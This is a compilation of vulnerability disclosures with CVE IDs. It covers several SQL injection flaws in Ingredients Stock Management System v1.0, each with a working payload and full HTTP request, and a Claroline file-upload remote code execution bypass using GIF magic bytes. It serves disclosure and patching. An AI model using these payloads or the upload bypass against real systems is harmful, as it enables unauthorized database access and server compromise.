Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_stockin.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/classes/Master.php?f=delete\_stockin

Vulnerability location: /isms/classes/Master.php?f=delete\_stockin, id

db\_name = isms\_db;

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /isms/classes/Master.php?f\=delete\_stockin HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36695: vul-wiki/SQLi-8.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_item.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/classes/Master.php?f=delete\_item

Vulnerability location: /isms/classes/Master.php?f=delete\_item, id

db\_name = isms\_db;

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /isms/classes/Master.php?f\=delete\_item HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36693: vul-wiki/SQLi-6.md at master · k0xx11/vul-wiki

A SQL injection vulnerability in license_update.php in Mumara Classic through 2.93 allows a remote unauthenticated attacker to execute arbitrary SQL commands via the license parameter.

CVE-2021-43329

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /items/manage_item.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/items/manage\_item.php

Vulnerability location: /isms/admin/items/manage\_item.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/items/manage\_item.php?id=4%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/items/manage\_item.php?id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36700: vul-wiki/SQLi-13.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/manage_category.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/categories/manage\_category.php

Vulnerability location: /isms/admin/categories/manage\_category.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/categories/manage\_category.php?id=3%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/categories/manage\_category.php?id\=3%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36699: vul-wiki/SQLi-11.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /stocks/manage_stockin.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/stocks/manage\_stockin.php

Vulnerability location /isms/admin/stocks/manage\_stockin.php, iid

db\_name = isms\_db;length=7

\[+\] Payload: /isms/admin/stocks/manage\_stockin.php?iid=4&id=4%27%20and%20length(database())%20=%207--+ // Leak place ---> iid

GET /isms/admin/stocks/manage\_stockin.php?iid\=4&id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36703: vul-wiki/SQLi-14.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/view_category.php.

Permalink

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/categories/view\_category.php

Vulnerability location: /isms/admin/categories/view\_category.php, id

db\_name = isms\_db;length=7

\[+\] Payload: /isms/admin/categories/view\_category.php?id=3%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /isms/admin/categories/view\_category.php?id\=3%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36698: vul-wiki/SQLi-10.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /items/view_item.php.

Permalink

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/items/view\_item.php

Vulnerability location: /isms/admin/items/view\_item.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/items/view\_item.php?id=3%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/items/view\_item.php?id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36701: vul-wiki/SQLi-12.md at master · k0xx11/vul-wiki

Claroline 13.5.7 and prior is vulnerable to Remote code execution via arbitrary file upload.

**Remote code execution via arbitrary file upload (version : 13.5.7)**

Claroline Connect app presents a RCE vulnerability because of the possibility to upload an arbitrary php file. This vulnerability is present on many upload forms, so I've personnally choosed the resource icon section.

The route **core/Controller/APINew/FileController.php** filters the upload image type by using the getMimeType() function from Symfony :

public function uploadImage(Request $request): JsonResponse
    {
        $files = $request\->files\->all();

        $objects = \[\];
        foreach ($files as $file) {
            if (0 !== strpos($file\->getMimeType(), 'image')) {
                throw new InvalidDataException('Invalid image type.');
            }

            $object = $this\->crud\->create(PublicFile::class, \[\], \['file' => $file, Crud::THROW\_EXCEPTION\]);
            $objects\[\] = $this\->serializer\->serialize($object);
        }

        return new JsonResponse($objects);
    }

It is possible to trick this function by adding some magic bytes like GIF8; which corresponds to the GIF image file type. The mime type image/gif should be also applied.

Then it is possible to get RCE by using the upload php shell :

**Fix suggestions :** Enhance file upload checks by adding real mime type verification (file content, bytes, size, etc).

CVE-2022-37159: claroline-CVEs/rce_file_upload.md at main · matthieu-hackwitharts/claroline-CVEs

Red Hat Security Advisory 2022-6158-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.

Tag

#php